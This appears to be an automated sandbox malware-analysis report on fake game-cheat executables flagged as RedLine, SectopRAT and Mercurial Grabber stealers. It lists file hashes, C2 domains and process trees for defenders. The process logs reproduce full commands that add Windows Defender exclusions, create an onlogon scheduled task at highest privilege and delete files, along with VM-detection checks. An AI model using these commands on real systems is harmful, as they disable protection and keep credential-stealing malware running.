| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe
"C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe"
C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
"C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe"
C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
Files
memory/2128-0-0x00000000748E1000-0x00000000748E2000-memory.dmp
memory/2128-2-0x00000000748E0000-0x0000000074E8B000-memory.dmp
memory/2128-1-0x00000000748E0000-0x0000000074E8B000-memory.dmp
\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
| MD5 | 56a7502c31f7e8b9df6026cca035d000 |
| SHA1 | a2e1dea33bec675650559a148f78f831a0c11886 |
| SHA256 | b6dffd0fcf337c0da1439857c9bb162c1965641e644163f702f29bc84fd04b9f |
| SHA512 | 82b2331d087d0543ef5004d59206f618db7ad91225b4720b302c7da2263972cadebc8412a3fa85262c993bfab5247cfa4cfea01d80ea4cbeb59c0ef7fbebe499 |
\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
| MD5 | 164b5610097d3c76850d0d3cc1f3892a |
| SHA1 | 31c439c5dab3c0a98ca827a07e17f903b8aae2f9 |
| SHA256 | e922d71f77061f2ce7100d4f1aea67b8477d7e9cd9e40a10a411868cf93bbc52 |
| SHA512 | fa832118802c3b4107911a541e8498a6c3acd1fba50c3e0a115899d521a77e293325397296d00353abd6d10965dc74b8fea1ee58dafa6547f05c76bd6e64450e |
memory/2128-15-0x00000000748E0000-0x0000000074E8B000-memory.dmp
memory/2188-16-0x000007FEF5E93000-0x000007FEF5E94000-memory.dmp
memory/2188-17-0x000000013FA00000-0x000000013FA10000-memory.dmp
memory/2720-22-0x000000001B810000-0x000000001BAF2000-memory.dmp
memory/2720-23-0x0000000001DE0000-0x0000000001DE8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | fe7691d2ecc05d98b3d4431abdc103c9 |
| SHA1 | 96d666b1984784b067cfec45c066fdfb44f15409 |
| SHA256 | 733a2010bc40d1bd02beb0480a22f5ece50583388780d8ae9ff404d417f34562 |
| SHA512 | 4fcce183c510af40b5a75f55e7fdaeeeed0f00d95494329c33d6dd07f45acdedce1f51fdbd03b2054f87341d1221884dfe363239a3144613d8d1257848d3198e |
memory/2084-29-0x000000001B690000-0x000000001B972000-memory.dmp
memory/2084-30-0x0000000001E70000-0x0000000001E78000-memory.dmp
memory/2452-46-0x000000013FCC0000-0x000000013FCCE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
| MD5 | a5bdb33481f19152370a4cbe486c1790 |
| SHA1 | d657448275485590e0b141bc3965f03650636e47 |
| SHA256 | ead94cc9778691b1388fc31b4a9ec1bb1220073508e80228bd85d325612d7075 |
| SHA512 | 61612206312611b2026e8a38a4b1f18a24fb8605e75bd2fe26d4132a6a4ab890e4096d8eb96e5f2cfc312885451f156ef6e56bd00943e1745ad532bbfef3d0fe |
memory/1632-53-0x000000013F930000-0x000000013F940000-memory.dmp
memory/2936-59-0x00000000021D0000-0x00000000021D8000-memory.dmp
memory/680-80-0x000000013F7F0000-0x000000013F7FE000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 0dc0c432c76b5f23dec8f2da05da574f |
| SHA1 | f93bb2cd4e300c5b7808c8aeb3d80797975ccfb0 |
| SHA256 | 9d4ed1c19be402033e56523eb9a78a928102c689c82e27ab926ea6f2206e8fee |
| SHA512 | 5cc10e825cc53878e89b44e9ae01973c194955364992cd769aaac49ecf5af392b01f051e2fe800c617a391555aa385ea56a2ae4d565287c1a5e42af93f1812e9 |
memory/976-88-0x000000013F350000-0x000000013F356000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabCEB6.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarCEB9.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/2460-201-0x000000013F1E0000-0x000000013F1F0000-memory.dmp
memory/2976-227-0x000000013FFE0000-0x000000013FFEE000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
| MD5 | 0c0195c48b6b8582fa6f6373032118da |
| SHA1 | d25340ae8e92a6d29f599fef426a2bc1b5217299 |
| SHA256 | 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 |
| SHA512 | ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 929a2212220e9b880c5e949576014004 |
| SHA1 | dc936f254917a52bda0ee7bfec4c9c61628504b8 |
| SHA256 | 0a7c8aeea55c9f23a296e9be56ad3063f945a456788680d4e15af58831cb4a59 |
| SHA512 | d693de9ee33cbdf87e42620536497ca64be7eebb7d621deb74daeafef23c5a7cc683cbc22b00e6fd7f84a174e7e887f5c1b35bac56b2fb33ae7c77e9543cf501 |
memory/2148-289-0x000000013F7B0000-0x000000013F7C0000-memory.dmp
memory/1128-315-0x000000013F230000-0x000000013F23E000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 88f0d219c19c0f974b513dff80e88bbe |
| SHA1 | 1e6ccf25389c37e5fef8cc2319ce466b9d09b465 |
| SHA256 | e3e0e3d9bb8c72e28d1bc4d2820be7aae7647cb3820a76c8fdd1d45614096155 |
| SHA512 | 26b730fddaceb4a317f68cbe387331bab03e7e3e10786e8cad0983a512d9159c5610c14e72f83135451a4b4f9d5fc1cb5362b09d552a6fedddb37b3f0931732c |
memory/1632-377-0x000000013FAD0000-0x000000013FAE0000-memory.dmp
memory/2508-396-0x000000013F720000-0x000000013F72E000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win7-20240903-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2420 set thread context of 1796 | N/A | C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe | C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"
C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"
C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"
C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
Files
memory/2420-0-0x0000000000F00000-0x0000000000F64000-memory.dmp
memory/1796-13-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1796-9-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1796-7-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1796-6-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1796-5-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1796-11-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1796-1-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1796-3-0x0000000000400000-0x000000000041E000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
157s
Command Line
Signatures
Mercurial Grabber Stealer
Mercurialgrabber family
Looks for VirtualBox Guest Additions in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip4.seeip.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
